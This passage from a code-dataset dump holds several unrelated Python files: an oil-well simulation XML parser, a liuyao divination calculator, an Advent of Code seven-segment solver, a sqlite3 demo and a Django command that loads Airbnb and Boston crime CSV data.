delimiter=';', quotechar='|')\r\n for row in spamreader:\r\n nome, valor_inicial, limite_inferior, limite_superior = 
row[0:4]\r\n for variavel in variaveis:\r\n vnome = ''.join([c for c in variavel.nome if c not in \"1234567890\"])\r\n if vnome == nome.strip(\" \"):\r\n variavel.limite_inferior = float(limite_inferior)\r\n variavel.limite_superior = float(limite_superior)\r\n\r\n print(variaveis)\r\n return variaveis\r\n\r\n\r\ndef atualiza_xml(variaveis):\r\n \"\"\"Atualiza variaveis definidas no arvquivo xml\"\"\"\r\n\r\n with codecs.open('baricentro.xml', encoding='ISO-8859-1', mode='r+') as f:\r\n bs = bs4.BeautifulSoup(f.read(), 'lxml')\r\n sistema_producao = bs.find(\"sistema_producao\")\r\n\r\n pr = sistema_producao.find(\"pr\")\r\n ip = sistema_producao.find(\"ip\")\r\n rgof = sistema_producao.find(\"rgof\")\r\n bsw = sistema_producao.find(\"bsw\")\r\n\r\n for obj in variaveis:\r\n if obj.tem_valor():\r\n if obj.nome == 'pr':\r\n pr.text = str(obj.valor[0])\r\n elif obj.nome == \"ip\":\r\n ip.text = str(obj.valor[0])\r\n elif obj.nome == \"rgof\":\r\n rgof.text = str(obj.valor[0])\r\n elif obj.nome == \"bsw\":\r\n bsw.text = str(obj.valor[0])\r\n\r\n linhas = ['linha_maritima',\r\n 'linha_aerea',\r\n 'poco_com_coluna',\r\n 'linha_maritima_inj',\r\n 'linha_aerea_inj',\r\n 'poco_sem_coluna',\r\n 'linha_enterrada',\r\n 'riser']\r\n\r\n for nome_linha in linhas:\r\n for linha in bs.find_all(nome_linha):\r\n trecho = linha.nome.text\r\n for corr in linha.find_all(\"corr\"):\r\n for objeto in variaveis:\r\n if objeto.tem_trecho(trecho) and objeto.tem_correlacao():\r\n corr.attrs[\"tipo\"] = objeto.correlacao\r\n\r\n for fator_correcao in linha.find_all(\"fatores_correcao\"):\r\n trecho = linha.nome.text\r\n for objeto in variaveis:\r\n if objeto.tem_trecho(trecho) and objeto.tem_valor():\r\n if objeto.nome == \"fcorrp\":\r\n for fcorrp in fator_correcao.find_all(\"fcorrp\"):\r\n fcorrp.string = str(objeto.valor[0])\r\n elif objeto.nome == \"fcorrt\":\r\n for fcorrp in fator_correcao.find_all(\"fcorrt\"):\r\n fcorrp.string = str(objeto.valor[0])\r\n\r\n html = bs.prettify(bs.original_encoding)\r\n f.seek(0)\r\n f.readline()\r\n f.truncate()\r\n f.write(html)\r\n\r\n\r\ndef le_output():\r\n fim = 0\r\n inicio = 0\r\n num_linhaVV = 0\r\n linhaVV = \"\"\r\n\r\n QOSC, QLSC, PWF, PTUB, TWF, PWH, TWH, QGSC, PPDG, TPDG, TSUP = [0] * 11\r\n\r\n with open('baricentro.xml', encoding='ISO-8859-1') as inf:\r\n for number, line in enumerate(inf, 1):\r\n if \"INICIO_SAIDA\" in line:\r\n inicio = number\r\n if \"**Fluidos**\" in line:\r\n fim = number\r\n if \"VV\" in line:\r\n num_linhaVV = number\r\n if \"Trechos por Unidades\" in line:\r\n linhaP = number\r\n\r\n with open('baricentro.xml', encoding='ISO-8859-1') as openfile:\r\n for number, line in enumerate(openfile, 1):\r\n if number == num_linhaVV:\r\n linhaVV = line\r\n\r\n if inicio < number < fim:\r\n for part in line.split():\r\n #print(line)\r\n if \"QOSC=\" in part: #Flux of oil in surface conditions\r\n QOSC = float(line.split('=')[1])\r\n if \"QLSC=\" in part: #Flux of liquid\r\n QLSC = float(line.split('=')[1])\r\n if \"PWF=\" in part: #Pressure well... 
pressão no caneado\r\n PWF = float(line.split('=')[1])\r\n if \"PTUB=\" in part:\r\n PTUB = float(line.split('=')[1])\r\n if \"TWF=\" in part:\r\n TWF = float(line.split('=')[1])\r\n if \"PWH=\" in part:\r\n PWH = float(line.split('=')[1])\r\n if \"TWH=\" in part:\r\n TWH = float(line.split('=')[1])\r\n if \"QGSC=\" in part:\r\n QGSC = float(line.split('=')[1])\r\n\r\n ## para ler PPDG, TPDG, TSUP:\r\n\r\n sequencia = 0\r\n bs = bs4.BeautifulSoup(openfile, 'lxml')\r\n for valvula in bs.find_all(\"valvulas_instalada\"):\r\n if valvula.find(\"fabricante\").text == \"PDG\":\r\n sequencia = int(valvula.attrib['seq']) + 1\r\n\r\n # valores de valvula\r\n vv = linhaVV.split('=')[1].split(';')\r\n\r\n tamanho = len(vv) - 1\r\n\r\n for i in range(len(vv)):\r\n if i < tamanho:\r\n if int(vv[i]) == sequencia:\r\n offset_linha_PDG = i + 2\r\n\r\n pressao_fundo, temperatura_fundo, temperatura_superficie = None, None, None\r\n\r\n with open('baricentro.xml', encoding='ISO-8859-1') as openfile:\r\n for number, line in enumerate(openfile, 1):\r\n if number == linhaP + offset_linha_PDG:\r\n pressao_fundo = line\r\n if number == linhaP + offset_linha_PDG + tamanho:\r\n temperatura_fundo = line\r\n if number == linhaP + tamanho + 1:\r\n temperatura_superficie = line\r\n\r\n pressao_fundo_PDG = (pressao_fundo.split(';')[0])\r\n PPDG = float(pressao_fundo_PDG.split('=')[1])\r\n\r\n temperatura_fundo_PDG = (temperatura_fundo.split(';')[0])\r\n TPDG = float(temperatura_fundo_PDG.split('=')[1])\r\n\r\n temperatura_sup = (temperatura_superficie.split(';')[0])\r\n TSUP = float(temperatura_sup.split('=')[1])\r\n\r\n ret = {\"QOSC\": QOSC, #fluxo de óleo em surface conditions\r\n \"QLSC\": QLSC, # liquido\r\n \"PWF\": PWF, # perssao fundo do poço\r\n \"PTUB\": PTUB, #pressao montante choke\r\n \"TWF\": TWF, #\r\n \"PWH\": PWH, # pressao na arbvore de natal\r\n \"TWH\": TWH, # temperatura na\r\n \"QGSC\": QGSC, #fluxo de gas surface condifions\r\n \"PPDG\": PPDG, #pressao pdg\r\n \"TPDG\": TPDG, #temepratura pdg\r\n \"TSUP\": TSUP} #temepratura do PTUB\r\n\r\n with open(\"debug_output.log\", \"a\") as f:\r\n print(ret, file=f)\r\n\r\n return ret\r\n\r\n\r\nif __name__ == \"__main__\":\r\n print(le_variaveis_de_controle())\r\n print(le_output())\r\n","sub_path":"le_xml.py","file_name":"le_xml.py","file_ext":"py","file_size_in_byte":8320,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"415650567","text":"# -*- coding: utf-8 -*-\n#周易六爻\nfrom gua_64 import GUA_64\nTIANGAN=[u\"甲\", u\"乙\", u\"丙\", u\"丁\", u\"戊\", u\"己\", u\"庚\", u\"辛\", u\"壬\", u\"癸\"]\nDIZHI=[u\"子\", u\"丑\", u\"寅\", u\"卯\", u\"辰\", u\"巳\", u\"午\", u\"未\", u\"申\", u\"酉\", u\"戌\", u\"亥\"]\n\nSISHI_WXXQ = {\n u\"木\":{u\"子\":u\"相\", u\"丑\":u\"囚\", u\"寅\":u\"旺\", u\"卯\":u\"旺\", u\"辰\":u\"囚\", u\"巳\":u\"休\", \\\n u\"午\":u\"休\", u\"未\":u\"囚\", u\"申\":u\"死\", u\"酉\":u\"死\", u\"戌\":u\"囚\", u\"亥\":u\"相\"},\n \n u\"火\":{u\"子\":u\"死\", u\"丑\":u\"休\", u\"寅\":u\"相\", u\"卯\":u\"相\", u\"辰\":u\"休\", u\"巳\":u\"旺\", \\\n u\"午\":u\"旺\", u\"未\":u\"休\", u\"申\":u\"囚\", u\"酉\":u\"囚\", u\"戌\":u\"休\", u\"亥\":u\"死\"},\n \n u\"土\":{u\"子\":u\"囚\", u\"丑\":u\"旺\", u\"寅\":u\"死\", u\"卯\":u\"死\", u\"辰\":u\"旺\", u\"巳\":u\"相\", \\\n u\"午\":u\"相\", u\"未\":u\"旺\", u\"申\":u\"休\", u\"酉\":u\"休\", u\"戌\":u\"旺\", u\"亥\":u\"囚\"},\n \n u\"金\":{u\"子\":u\"休\", u\"丑\":u\"相\", u\"寅\":u\"囚\", u\"卯\":u\"囚\", u\"辰\":u\"相\", u\"巳\":u\"死\", \\\n u\"午\":u\"死\", u\"未\":u\"相\", u\"申\":u\"旺\", u\"酉\":u\"旺\", u\"戌\":u\"相\", u\"亥\":u\"休\"},\n \n 
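    # (Added note) SISHI_WXXQ tabulates seasonal strength: for each of the five
    # elements (wood, fire, earth, metal, water) it maps every earthly branch
    # to one of the states 旺 (prosperous), 相 (assisted), 休 (resting),
    # 囚 (trapped) or 死 (dead).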
u\"水\":{u\"子\":u\"旺\", u\"丑\":u\"死\", u\"寅\":u\"休\", u\"卯\":u\"休\", u\"辰\":u\"死\", u\"巳\":u\"囚\", \\\n u\"午\":u\"囚\", u\"未\":u\"死\", u\"申\":u\"相\", u\"酉\":u\"相\", u\"戌\":u\"死\", u\"亥\":u\"旺\"},\n }\n\nWUXING_JISHENG = {\n u\"木\":{u\"子\":u\"沐浴\", u\"丑\":u\"冠带\", u\"寅\":u\"临官\", u\"卯\":u\"帝旺\", u\"辰\":u\"衰\", u\"巳\":u\"病\", \\\n u\"午\":u\"死\", u\"未\":u\"墓\", u\"申\":u\"绝\", u\"酉\":u\"胎\", u\"戌\":u\"养\", u\"亥\":u\"长生\"},\n \n u\"火\":{u\"子\":u\"胎\", u\"丑\":u\"养\", u\"寅\":u\"长生\", u\"卯\":u\"沐浴\", u\"辰\":u\"冠带\", u\"巳\":u\"临官\", \\\n u\"午\":u\"帝旺\", u\"未\":u\"衰\", u\"申\":u\"病\", u\"酉\":u\"死\", u\"戌\":u\"墓\", u\"亥\":u\"绝\"},\n \n u\"土\":{u\"子\":u\"帝旺\", u\"丑\":u\"衰\", u\"寅\":u\"病\", u\"卯\":u\"死\", u\"辰\":u\"墓\", u\"巳\":u\"绝\", \\\n u\"午\":u\"胎\", u\"未\":u\"养\", u\"申\":u\"长生\", u\"酉\":u\"沐浴\", u\"戌\":u\"冠带\", u\"亥\":u\"临官\"},\n \n u\"金\":{u\"子\":u\"死\", u\"丑\":u\"墓\", u\"寅\":u\"绝\", u\"卯\":u\"胎\", u\"辰\":u\"养\", u\"巳\":u\"长生\", \\\n u\"午\":u\"沐浴\", u\"未\":u\"冠带\", u\"申\":u\"临官\", u\"酉\":u\"帝旺\", u\"戌\":u\"衰\", u\"亥\":u\"病\"},\n \n u\"水\":{u\"子\":u\"帝旺\", u\"丑\":u\"衰\", u\"寅\":u\"病\", u\"卯\":u\"死\", u\"辰\":u\"墓\", u\"巳\":u\"绝\", \\\n u\"午\":u\"胎\", u\"未\":u\"养\", u\"申\":u\"长生\", u\"酉\":u\"沐浴\", u\"戌\":u\"冠带\", u\"亥\":u\"临官\"}\n }\n\nDIZHI_LIUHE = [(u\"子\",u\"丑\"), (u\"寅\",u\"亥\"), (u\"卯\",u\"戌\"), (u\"辰\",u\"酉\"), (u\"巳\",u\"申\"), (u\"午\", u\"未\")]\nDIZHI_LIUCHONG = [(u\"子\",u\"午\"), (u\"丑\", u\"未\"), (u\"寅\",u\"申\"), (u\"卯\",u\"酉\"), (u\"辰\",u\"戌\"), (u\"巳\",u\"亥\")]\nDIZHI_BIFU = [(u\"子\",u\"亥\"), (u\"丑\",u\"辰\"), (u\"寅\",u\"卯\"), (u\"辰\",u\"未\"), (u\"巳\",u\"午\"), (u\"未\", u\"戌\"), (u\"申\", u\"酉\")]\n\nWUXING_SHENKE = {\n u\"金\":{u\"金\":u\"\", u\"木\":u\"克\", u\"水\":u\"生\", u\"火\":u\"耗\", u\"土\":u\"泄\"},\n u\"木\":{u\"金\":u\"耗\", u\"木\":u\"\", u\"水\":u\"泄\", u\"火\":u\"生\", u\"土\":u\"克\"},\n u\"水\":{u\"金\":u\"泄\", u\"木\":u\"生\", u\"水\":u\"\", u\"火\":u\"克\", u\"土\":u\"耗\"},\n u\"火\":{u\"金\":u\"克\", u\"木\":u\"泄\", u\"水\":u\"耗\", u\"火\":u\"\", u\"土\":u\"生\"},\n u\"土\":{u\"金\":u\"生\", u\"木\":u\"耗\", u\"水\":u\"克\", u\"火\":u\"泄\", u\"土\":u\"\"}\n }\n\nDIZHI_WUXING = {u\"子\":u\"水\", u\"丑\":u\"土\", u\"寅\":u\"木\", u\"卯\":u\"木\", u\"辰\":u\"土\", u\"巳\":u\"火\", \\\n u\"午\":u\"火\", u\"未\":u\"土\", u\"申\":u\"金\", u\"酉\":u\"金\", u\"戌\":u\"土\", u\"亥\":u\"水\",\n None:u''}\n\nYAO_ORDER = [u'上爻',u'五爻',u'四爻',u'三爻',u'二爻',u'初爻',]\nYAO_FUHAO = {u'阴':u'- -',u'阳':u'——',u'老阴':u'X',u'老阳':u'O'}\n\nXUNKONG = [{'xun':[u'甲子',u'乙丑',u'丙寅',u'丁卯',u'戊辰',u'己巳',u'庚午',u'辛未',u'壬申',u'癸酉'], 'kongwang':[u'戌',u'亥']},\n{'xun':[u'甲戌',u'乙亥',u'丙子',u'丁丑',u'戊寅',u'己卯',u'庚辰',u'辛巳',u'壬午',u'癸未'],'kongwang':[u'申',u'酉']},\n{'xun':[u'甲申',u'乙酉',u'丙戌',u'丁亥',u'戊子',u'己丑',u'庚寅',u'辛卯',u'壬辰',u'癸巳'],'kongwang':[u'午',u'未']},\n{'xun':[u'甲午',u'乙未',u'丙申',u'丁酉',u'戊戌',u'己亥',u'庚子',u'辛丑',u'壬寅',u'癸卯'],'kongwang':[u'辰',u'巳']},\n{'xun':[u'甲辰',u'乙巳',u'丙午',u'丁未',u'戊申',u'己酉',u'庚戌',u'辛亥',u'壬子',u'癸丑'],'kongwang':[u'寅',u'卯']},\n{'xun':[u'甲寅',u'乙卯',u'丙辰',u'丁巳',u'戊午',u'己未',u'庚申',u'辛酉',u'壬戌',u'癸亥'],'kongwang':[u'子',u'丑']}]\n\nclass Liuyao():\n def __init__(self):\n self.guainfo = None\n \n def load_conf(self):\n pass\n \n def load_data(self, guainfo):\n self.guainfo = guainfo\n self.month = guainfo.month\n self.day = guainfo.day\n self.shen = guainfo.shen\n self.gua = guainfo.gua\n #print self.month, self.month, self.shen\n \n \n# 世应\n# 动静\n#\n# 临月\n# 临日\n# 旬空\n# 五行四时旺相休囚\n# 月地支(六合,六冲,比扶)\n# 月五行寄生\n# 月五行生克\n# 日地支(六合,六冲,比扶)\n# 日五行寄生\n# 日五行生克\n def power(self, month, day, najia):\n row = dict()\n month_dizhi = month[1]\n day_dizhi = day[1]\n \n if najia == month_dizhi:\n row[\"linyue\"] 
= True\n if najia == day_dizhi:\n row[\"linri\"] = True\n \n row['xunkong'] = False\n for xun in XUNKONG:\n if day in xun['xun']:\n if najia in xun['kongwang']:\n row['xunkong'] = True\n \n najia_wuxing = DIZHI_WUXING[najia]\n row['sishi'] = SISHI_WXXQ[najia_wuxing][month_dizhi]\n \n row['yuedizhi'] = []\n if (month_dizhi, najia) in DIZHI_LIUHE:\n row['yuedizhi'].append(u'六合')\n if (najia, month_dizhi) in DIZHI_LIUHE:\n row['yuedizhi'].append(u'六合')\n \n if (month_dizhi, najia) in DIZHI_LIUCHONG:\n row['yuedizhi'].append(u'六冲')\n if (najia, month_dizhi) in DIZHI_LIUCHONG:\n row['yuedizhi'].append(u'六冲')\n \n if (month_dizhi, najia) in DIZHI_BIFU:\n row['yuedizhi'].append(u'比扶')\n if (najia, month_dizhi) in DIZHI_BIFU:\n row['yuedizhi'].append(u'比扶')\n \n row['yuejisheng'] = WUXING_JISHENG[najia_wuxing][month_dizhi]\n \n row['yueshengke'] = WUXING_SHENKE[DIZHI_WUXING[month_dizhi]][najia_wuxing]\n \n row['ridizhi'] = []\n if (day_dizhi, najia) in DIZHI_LIUHE:\n row['ridizhi'].append(u'六合')\n if (najia, day_dizhi) in DIZHI_LIUHE:\n row['ridizhi'].append(u'六合')\n \n if (day_dizhi, najia) in DIZHI_LIUCHONG:\n row['ridizhi'].append(u'六冲')\n if (najia, day_dizhi) in DIZHI_LIUCHONG:\n row['ridizhi'].append(u'六冲')\n \n if (day_dizhi, najia) in DIZHI_BIFU:\n row['ridizhi'].append(u'比扶')\n if (najia, day_dizhi) in DIZHI_BIFU:\n row['ridizhi'].append(u'比扶')\n \n row['rijisheng'] = WUXING_JISHENG[najia_wuxing][day_dizhi]\n \n row['rishengke'] = WUXING_SHENKE[DIZHI_WUXING[day_dizhi]][najia_wuxing]\n \n return row\n \n \n \n \n\n def calc(self):\n bengua = ''\n biangua = ''\n bian_pattern = []\n for i, yao in enumerate(self.gua):\n if yao == u'阴':\n bengua = bengua + u'阴'\n biangua = biangua + u'阴'\n if yao == u'阳':\n bengua = bengua + u'阳'\n biangua = biangua + u'阳'\n if yao == u'老阴':\n bengua = bengua + u'阴'\n biangua = biangua + u'阳'\n bian_pattern.append((i,yao))\n if yao == u'老阳':\n bengua = bengua + u'阳'\n biangua = biangua + u'阴'\n bian_pattern.append((i,yao))\n \n bengua_bin = ''\n biangua_bin = ''\n for yao in bengua:\n if yao == u'阴':\n bengua_bin = bengua_bin + '0'\n if yao == u'阳':\n bengua_bin = bengua_bin + '1'\n \n for yao in biangua:\n if yao == u'阴':\n biangua_bin = biangua_bin + '0'\n if yao == u'阳':\n biangua_bin = biangua_bin + '1'\n \n bengua_najia = {}\n biangua_najia = {}\n for gua in GUA_64:\n if gua['pattern'] == bengua_bin:\n bengua_najia = gua\n if gua['pattern'] == biangua_bin:\n biangua_najia = gua\n \n liuyao_info = {}\n liuyao_info['shen'] = self.shen\n liuyao_info['month'] = self.month\n liuyao_info['day'] = self.day\n liuyao_info['bengua'] = bengua_najia['name']\n liuyao_info['bengua_house'] = bengua_najia['house']\n liuyao_info['biangua'] = biangua_najia['name']\n liuyao_info['biangua_house'] = biangua_najia['house']\n \n gua_table = []\n for i in range(6):\n gua_row = {}\n gua_row['yao'] = YAO_ORDER[i]\n gua_row['gua'] = YAO_FUHAO[self.gua[i]]\n gua_row['bengua'] = YAO_FUHAO[bengua[i]]\n gua_row['bengua_liuqin'] = bengua_najia['guashen'][i]['liuqin']\n gua_row['bengua_najia'] = bengua_najia['guashen'][i]['najia']\n gua_row['bengua_wuxing'] = DIZHI_WUXING[bengua_najia['guashen'][i]['najia']]\n gua_row['bengua_shiying'] = bengua_najia['guashen'][i]['shiying']\n gua_row['bengua_fushen'] = bengua_najia['guashen'][i]['fushen']\n gua_row['bengua_funajia'] = bengua_najia['guashen'][i]['funajia']\n gua_row['bengua_fuwuxing'] = DIZHI_WUXING[bengua_najia['guashen'][i]['funajia']]\n for (j, yao) in bian_pattern:\n if i == j:\n gua_row['bian'] = '——>'\n gua_row['biangua'] = 
YAO_FUHAO[biangua[i]]\n gua_row['biangua_liuqin'] = biangua_najia['guashen'][i]['liuqin']\n gua_row['biangua_najia'] = biangua_najia['guashen'][i]['najia']\n gua_row['biangua_wuxing'] = DIZHI_WUXING[biangua_najia['guashen'][i]['najia']]\n gua_row['biangua_shiying'] = biangua_najia['guashen'][i]['shiying']\n gua_row['biangua_fushen'] = biangua_najia['guashen'][i]['fushen']\n gua_row['biangua_funajia'] = biangua_najia['guashen'][i]['funajia']\n gua_row['biangua_fuwuxing'] = DIZHI_WUXING[biangua_najia['guashen'][i]['funajia']]\n \n gua_table.append(gua_row)\n \n bengua_table = []\n fushen_table = []\n biangua_table = []\n for i in range(6):\n bengua_row = self.power(self.month,self.day,bengua_najia['guashen'][i]['najia'])\n bengua_row['yao'] = YAO_ORDER[i]\n bengua_row['gua'] = YAO_FUHAO[bengua[i]]\n bengua_row['liuqin'] = bengua_najia['guashen'][i]['liuqin']\n bengua_row['najia'] = bengua_najia['guashen'][i]['najia']\n bengua_row['wuxing'] = DIZHI_WUXING[bengua_najia['guashen'][i]['najia']]\n bengua_row['shiying'] = bengua_najia['guashen'][i]['shiying']\n \n bengua_row['dongjing'] = u'静'\n for (j, yao) in bian_pattern:\n if i == j:\n bengua_row['dongjing'] = u'动'\n biangua_row = self.power(self.month,self.day,biangua_najia['guashen'][i]['najia'])\n biangua_row['yao'] = YAO_ORDER[i]\n biangua_row['gua'] = YAO_FUHAO[bengua[i]]\n biangua_row['liuqin'] = bengua_najia['guashen'][i]['liuqin']\n biangua_row['najia'] = bengua_najia['guashen'][i]['najia']\n biangua_row['wuxing'] = DIZHI_WUXING[bengua_najia['guashen'][i]['najia']]\n biangua_row['shiying'] = bengua_najia['guashen'][i]['shiying']\n biangua_row['biangua'] = YAO_FUHAO[biangua[i]]\n biangua_row['biangua_liuqin'] = biangua_najia['guashen'][i]['liuqin']\n biangua_row['biangua_najia'] = biangua_najia['guashen'][i]['najia']\n biangua_row['biangua_wuxing'] = DIZHI_WUXING[biangua_najia['guashen'][i]['najia']]\n biangua_table.append(biangua_row)\n \n bengua_row['shiying'] = bengua_najia['guashen'][i]['shiying']\n bengua_table.append(bengua_row)\n if not bengua_najia['guashen'][i]['fushen'] == None:\n fushen_row = self.power(self.month,self.day,bengua_najia['guashen'][i]['funajia'])\n fushen_row['yao'] = YAO_ORDER[i]\n fushen_row['gua'] = YAO_FUHAO[bengua[i]]\n fushen_row['liuqin'] = bengua_najia['guashen'][i]['liuqin']\n fushen_row['najia'] = bengua_najia['guashen'][i]['najia']\n fushen_row['wuxing'] = DIZHI_WUXING[bengua_najia['guashen'][i]['najia']]\n fushen_row['shiying'] = bengua_najia['guashen'][i]['shiying']\n fushen_row['fushen'] = bengua_najia['guashen'][i]['fushen']\n fushen_row['funajia'] = bengua_najia['guashen'][i]['funajia']\n fushen_row['fuwuxing'] = DIZHI_WUXING[bengua_najia['guashen'][i]['funajia']]\n fushen_table.append(fushen_row)\n \n \n \n return (liuyao_info, gua_table, bengua_table, fushen_table, biangua_table)\n \n \n \n ","sub_path":"astro_render/liuyao.py","file_name":"liuyao.py","file_ext":"py","file_size_in_byte":14012,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"141250973","text":"#!/usr/bin/env python-mr\n\nfrom collections import defaultdict\nfrom itertools import permutations\nfrom _.data.formatting.blocks import Block\nfrom _.command_line.flags import Flag\n\ndef intersection(sets):\n result = sets[0]\n for s in sets[1:]:\n result = result.intersection(s)\n return result\n\n\nclass BitSegments:\n @staticmethod\n def to_int(segments):\n out = 0\n for s in segments:\n offset = ord(s) - ord(\"a\")\n out += (1 << offset)\n return out\n\n @staticmethod\n def 
to_str(segments):\n    out = \"\"\n    offset = 0\n    while segments:\n      if segments & 1:\n        o = offset + ord(\"a\")\n        out += chr(o)\n      offset += 1\n      segments = segments >> 1\n    return out\n\n\nclass BrokenDisplaySegment:\n  DIGITS = {\n    1: \"cf\",\n    7: \"acf\",\n    4: \"bcdf\",\n    2: \"acdeg\",\n    3: \"acdfg\",\n    5: \"abdfg\",\n    0: \"abcefg\",\n    6: \"abdefg\",\n    9: \"abcdfg\",\n    8: \"abcdefg\",\n  }\n\n  CHARACTERS = {value: key for key, value in DIGITS.items()}\n  CHARACTERS_B = {BitSegments.to_int(value): key for key, value in DIGITS.items()}\n\n  @staticmethod\n  def parse(string):\n    patterns = string.strip().split(\" \")\n    patterns.sort(key=len)\n    return BrokenDisplaySegment(patterns)\n\n  def __init__(self, patterns):\n    self._patterns = patterns\n    self._map = None\n    self._bmap = None\n\n  def solve(self) -> str:\n    if self._map:\n      return self._map\n\n    # Patterns already sorted by length\n    pats = [set(p) for p in self._patterns]\n    one, seven, four, mtwo, mthree, mfive, *zerosixnine, eight = pats\n\n    a = seven.difference(one).pop()  # 7 minus 1 leaves only the top segment\n    cf = seven.intersection(one)\n    # top, middle and bottom are the segments shared by 2, 3 and 5\n    adg = intersection((mtwo, mthree, mfive))\n    d = four.intersection(adg).pop()\n    b = four.difference(one).difference(d).pop()\n    g = adg.difference(a + d).pop()\n\n    zero, = [by for by in zerosixnine if d not in by]\n    sixnine = [by for by in zerosixnine if d in by]\n\n    ce = sixnine[0].symmetric_difference(sixnine[1])  # 6 and 9 differ in c and e\n    c = cf.intersection(ce).pop()\n    e = ce.difference(c).pop()\n    f = cf.difference(c).pop()\n\n    mapped = a + b + c + d + e + f + g\n    self._map = {m: char for m, char in zip(mapped, \"abcdefg\")}\n    return self._map\n\n  def solve_bits(self):\n    if self._bmap:\n      return self._bmap\n\n    # Patterns already sorted by length\n    pats = [BitSegments.to_int(p) for p in self._patterns]\n    one, seven, four, mtwo, mthree, mfive, *zerosixnine, eight = pats\n\n    a = one ^ seven  # the single bit in 7 but not in 1\n    cf = seven & one\n    # top, middle and bottom are the bits common to 2, 3 and 5\n    adg = mtwo & mthree & mfive\n    d = four & adg  # the middle bar is the only segment 4 shares with adg\n    b = (four ^ one) ^ d  # 4 minus 1 is {b, d}; dropping d leaves b\n    g = adg ^ (a | d)\n\n    zero, = [by for by in zerosixnine if not d & by]\n    msix, mnine = [by for by in zerosixnine if d & by]\n\n    ce = msix ^ mnine  # 6 and 9 differ exactly in segments c and e\n    c = cf & ce\n    e = ce ^ c\n    f = cf ^ c\n\n    bmap = {\n      a: \"a\",\n      b: \"b\",\n      c: \"c\",\n      d: \"d\",\n      e: \"e\",\n      f: \"f\",\n      g: \"g\",\n    }\n    self._bmap = {key: BitSegments.to_int(value) for key, value in bmap.items()}\n    return self._bmap\n\n  def find_digit(self, display_digit: str):\n    mapping = self.solve()\n    remapped = [mapping[d] for d in display_digit]\n    remapped.sort()\n    return BrokenDisplaySegment.CHARACTERS[\"\".join(remapped)]\n\n  def find_digit_(self, display_digit: str):\n    mapping = self.solve_bits()\n    remap = 0\n    for d in display_digit:\n      remap |= mapping[BitSegments.to_int(d)]\n    return BrokenDisplaySegment.CHARACTERS_B[remap]\n\n\nLOAD = \"content\"\ndef REWRITE(lines):\n  l = []\n  for line in lines:\n    patterns, digits = line.split(\"|\")\n    display = BrokenDisplaySegment.parse(patterns)\n    digits = digits.strip().split(\" \")\n    l.append((display, digits))\n  return l\n\n\ndef PART1(inputs):\n  counts = defaultdict(int)\n  for display, digits in inputs:\n    real = [display.find_digit(d) for d in digits]\n    for r in real:\n      counts[r] += 1\n\n  return counts[1] + counts[4] + counts[7] + counts[8]\n\n\ndef as_int(a, b, c, d):\n  return a * 1000 + b * 100 + c * 10 + d\n\n\ndef PART2(inputs):\n  sum = 0\n  for display, digits in inputs:\n    value = as_int(*[display.find_digit(d) for d in digits])\n    sum += value\n\n  return 
sum\n","sub_path":"2021/day-08/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4181,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"338456120","text":"import sqlite3\n\n# Connect to database\nconn = sqlite3.connect(\"customers.db\")\n\n# Create a cursor\nc = conn.cursor()\n\n# Ordering results\n# AND & OR add more conditions to your WHERE cause\nc.execute(\"SELECT rowid, * FROM customers WHERE last_name LIKE 'custumer%' AND rowid = 2\")\n# This works like any logical condition\n\n# Commit changes to db\nconn.commit()\n\n# Only to verify that changes have been done we will print it to screen\nc.execute(\"SELECT * FROM customers\")\n\nprint(c.fetchall())\n\n# Close connection to db\nconn.close()\n","sub_path":"andOr.py","file_name":"andOr.py","file_ext":"py","file_size_in_byte":524,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"4852287","text":"import csv\nfrom csv import DictReader\nimport urllib.request\nimport io\n\nfrom django.core.management import BaseCommand\n\nfrom airbnbtech.models import FinalLocation, Location, Transportation, Food, Crime\n\ncrime_url = 'https://data.boston.gov/dataset/6220d948-eae2-4e4b-8723-2dc8e67722a3/resource/12cb3883-56f5-47de-afa5-3b1cf61b257b/download/tmp8npb60c9.csv'\n# crime_url = 'https://raw.githubusercontent.com/CCalderon01/techtogether/crimedataadd/mock_data.csv'\ncontents = urllib.request.urlopen(crime_url)\ndatareader = csv.reader(io.TextIOWrapper(contents))\nlistData = list(datareader)\n\nindex_offense_code = 1\nindex_district = 4\nindex_latitude = 14\nindex_longitude = 15\n\nALREADY_LOADED_ERROR_MESSAGE = \"\"\"\nIf you need to reload the airbnb data from the CSV file,\nfirst delete the db.sqlite3 file to destroy the database.\nThen, run `python manage.py migrate` for a new empty\ndatabase with tables\"\"\"\n\ndef CheckDataValid(row_to_check):\n data = []\n for cell_t in row_to_check:\n data.append(cell_t)\n cell = data[index_district].replace(\"\\'\",\"\")\n cell = cell.replace(\" \",\"\")\n if not cell:\n return False\n else:\n return True\n\nclass Command(BaseCommand):\n # Show this when the user types help\n help = \"Loads data from listings.csv into our airbnb model\"\n\n def handle(self, *args, **options):\n if FinalLocation.objects.exists() or Location.objects.exists() or Transportation.objects.exists() or Food.objects.exists():\n print('Airbnb data already loaded...exiting.')\n print(ALREADY_LOADED_ERROR_MESSAGE)\n return\n print(\"Loading airbnb data\")\n for row in DictReader(open('./listings.csv')):\n location = Location()\n location.name = row['name']\n location.url = row['listing_url']\n location.id = row['id']\n location.neighborhood = row['neighbourhood_cleansed']\n location.zip_code = row['zipcode']\n location.latitude = row['latitude']\n location.longitude = row['longitude']\n location.room_type = row['room_type']\n location.accomodates = row['accommodates']\n location.price = row['price']\n location.review_rating = row['review_scores_location']\n location.save()\n header = True\n for row in listData:\n # Checking if the row is a header --> skip\n if header:\n header = False\n continue\n data = []\n for cell in row:\n data.append(cell)\n if CheckDataValid(row):\n crime = Crime()\n crime.latitude = data[index_latitude].replace(\"\\'\",\"\")\n crime.longitude = data[index_longitude].replace(\"\\'\",\"\")\n crime.offense_code = int(data[index_offense_code].replace(\"\\'\",\"\"))\n if(crime.offense_code 
